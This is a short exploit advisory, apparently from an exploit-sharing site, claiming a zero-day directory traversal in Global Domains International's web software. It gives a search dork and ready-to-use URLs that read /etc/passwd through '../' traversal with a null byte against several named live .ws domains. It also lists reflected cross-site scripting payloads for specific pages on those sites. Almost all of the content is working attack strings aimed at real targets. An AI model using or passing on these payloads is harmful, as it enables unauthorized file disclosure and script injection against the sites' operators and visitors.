====================================================================================================================================
| # Title : Global Domains International Directory traversal Vulnerability 0-Day |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : http://www.nic.ws |
====================================================================================================================================
# Dork : Copyright © 2014 by Global Domains International, Inc · All Rights Reserved
http://www.nic.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
https://www.website.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://www.7.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://www.movie.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://welcome-back.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
Cross site scripting (verified) :
/article.dhtml?article=touring&sponsor=wsnic%22%20onmouseover%3dprompt(771818860)%20bad%3d%22
/kvmlm2/index.dhtml?fname=1%22%20onmouseover%3dprompt(771818860)%20bad%3d%22&language=spanish&lname=&sponsor=gdi&template=11
/members/?language=english'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
/orderflow/index.dhtml?sponsor=1'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
http://freedom.ws/?language=french%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28771818860%29%3C/ScRiPt%3E
freedom.ws/show_dvd.dhtml?language=spanish'"()%26%25<ScRiPt >prompt(771818860)</ScRiPt>&sponsor=gditraffic
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================